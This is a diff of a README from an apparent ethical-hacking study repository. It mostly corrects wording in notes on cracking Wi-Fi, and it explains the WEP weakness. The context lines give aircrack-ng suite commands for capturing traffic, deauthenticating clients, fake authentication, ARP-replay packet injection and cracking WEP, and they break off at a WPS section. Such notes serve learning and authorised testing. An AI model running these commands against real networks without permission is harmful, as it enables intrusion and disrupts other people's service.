RodgerOliver/ethical-hacking/README.md

   * `airodump-ng --channel <network channel> --bssid <network bssid> --write <file-name> wlan0mon`
 * Deauth Attacks
   * `aireplay-ng --deauth <num-of-packets> -a <network bssid> -c <target bssid> wlan0mon`

 ## Crack WEP

-WEP stands for Wired Equivalent Privacy and is an old encryption method that uses RC4 algorithm to encrypt the packets.
-In this encryption method the packet is encrypted with the key by the sender, and the reciver decrypts it.
+WEP stands for Wired Equivalent Privacy and is an old encryption method that uses the RC4 algorithm to encrypt the packets.
+In this encryption method, the packet is encrypted with the key by the sender, and the receiver decrypts it.
 Each packet sent has a unique keystream.
-Random initialization vector (IV) added to the WEP key is used to create this keystream.
+A random initialization vector (IV) is added to the WEP key is used to create this keystream.
 Then this keystream is used to encrypt the packet.
-This IV is sent in plain text with the packet for the receiver to decrypt it, and it is only
+This IV is sent in plain text with the packet for the receiver to decrypt it, and it is only 24-bits long.
-24-bits long.

 ### Busy Network

 * Start airodump-ng in the target network
 * Crack
   * `aircrack-ng <network-file>`

 ### NOT Busy Network

 * Associate with the target network (tell the network that I wnat to connect to it)
 * Fake Auth (Associate)
   * `aireplay-ng --fakeauth 0 -a <network bssid> -h <wireless adapter MAC> wlan0mon`
 * Packet Injection
   * `aireplay-ng --arpreplay -b <network bssid> -h <wireless adapter MAC> wlan0mon`

 ## Crack WPA/WPA2

 ### With WPS

 * If wash is not working
   * `mkdir /etc/reaver`
 * Check if the network has WPS